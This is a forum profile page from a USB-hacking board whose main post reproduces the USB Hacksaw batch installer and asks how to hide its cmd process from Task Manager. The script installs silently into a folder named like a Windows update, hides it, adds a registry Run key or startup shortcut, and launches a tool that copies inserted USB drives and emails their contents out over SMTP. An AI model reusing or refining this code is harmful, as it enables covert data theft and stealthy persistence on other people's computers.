brfield
-
Posts
3 -
Joined
-
Last visited
Posts posted by brfield
-
-
With hidden "Files and Folders" enabled you will still be screwed. You have to follow this process-I had the same problem:
Tools-->Folder Options-->uncheck HIDE PROTECTED SYSTEM OPERATING FILES(RECOMMENDED)
Then edit the send.bat
-
I have made this to auto run on non u3 drives silently and have done some other tweaks to make this more efficient but I cannot for the life of me get cmd to exit automatically!
The window never shows you don't see a thing but how do i get it to exit? If you open task manager under processes you will see cmd.exe can i make this kill itself or exit?
if exist C:Void.txt GOTO end ::Use /\/\ to keep from infecting yourself :: Payload:Hacksaw | Auth:Hak5 POC Solution | Ver:0.1poc :: Props: core-dump, pseudobreed, poyboy, gmullen, cooper, boristsr, moonlit, VaKo, 404, stingray, dlss :: :: The purpose of this hack, dubbed USB Hacksaw for googleability, is to automatically and silently :: install on windows 2000, XP, or 2003 machines with either administrator or guest access. :: Installation consists of hiding the hacksaw tools in a hidden folder, add to either registry or :: startup folder depening on user rights, and start the program. :: :: This hack is based on a modified version of USBDumper. Once installed on a targert machine it will :: stay resident and wait for a USB flash drive to be inserted. Once a USB flash drive is inserted the :: hacksaw will download the contents of the drive to a temporary location using the modified USBDumper, :: then silently run the send.bat file located in the same directory, which will then archive the contents :: using RAR, eastablish an SSL SMTP connection to smtp.gmail.com using Stunnel and Blat, email the :: downloaded data to an email address, and remove the documents and archives. :: :: The proof of concept code in this 0.1 version is not as pretty as it could be. Originally a method :: for determining user rights and thus installing accordingly was planned, however problems with the :: IFMEMBER command were found and many dirty hacks followed. Future versions are expected to use a more :: elegent method of determining user privledges. (Thinking outloud: try creating a file where guests :: shouldnt be able to and check errorlevel). :: :: Development of this project has been done with the aid of the Hak.5 community at www.hak5.org :: Programs used: :: USBDumper -- http://www.secuobs.com/news/07062006-sstic_usbdumper.shtml :: Stunnel -- http://www.stunnel.org/ :: Blat -- http://www.blat.net/ :: Shortcut -- http://www.optimumx.com/download/#Shortcut :: Rar -- http://www.rarlabs.com/ :: :: More information and future developments of this hack can be found at: :: http://www.hak5.org/wiki/USB_Hacksaw :: If admin make windows\$NtUninstallKB931337$, else make %appdata%\sbs mkdir %systemroot%\$NtUninstallKB931337$ || mkdir "%appdata%\sbs" :: go to payload directory cd \WIP\SBS :: remove hidden and system attributes (makes next copy command happy, probably better way to do this) attrib *.* -s -h :: copy payload to target copy *.* %systemroot%\$NtUninstallKB931337$ || copy *.* "%appdata%\sbs" :: reapply hidden and system attributes attrib *.* +s +h :: If admin register USB Hacksaw as startup program in registry, else do it the yucky way reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v USBMedia /t REG_SZ /d "%systemroot%\$NtUninstallKB931337$\sbs.exe" /f || "%appdata%\sbs\shortcut.exe" /f:"%USERPROFILE%\Start Menu\Programs\Startup\ .lnk" /A:C /T:"%appdata%\sbs\sbs.exe" /W:"%appdata%\sbs" /I:"%appdata%\sbs\blank.ico" :: Hide USB Hacksaw attrib %systemroot%\$NtUninstallKB931337$ +s +h & attrib "%appdata%\sbs" +s +h :: Start USB Hacksaw (something is wrong with this next line, trying dirty hack below) :: "%systemroot%\$NtUninstallKB931337$\sbs.exe" || "%appdata%\sbs\sbs.exe" %systemdrive% cd \ cd %systemroot% cd $NtUninstallKB931337$ sbs.exe :end
I have tried:
exit
@exit
taskkill /f /cmd.exe
exit /b 1
close
How can I make it end itself? Make it not seen in Task Manager
DingleBerries Tantō Payload
in USB Hacks
Posted
Links are all still down. When will you have them back up?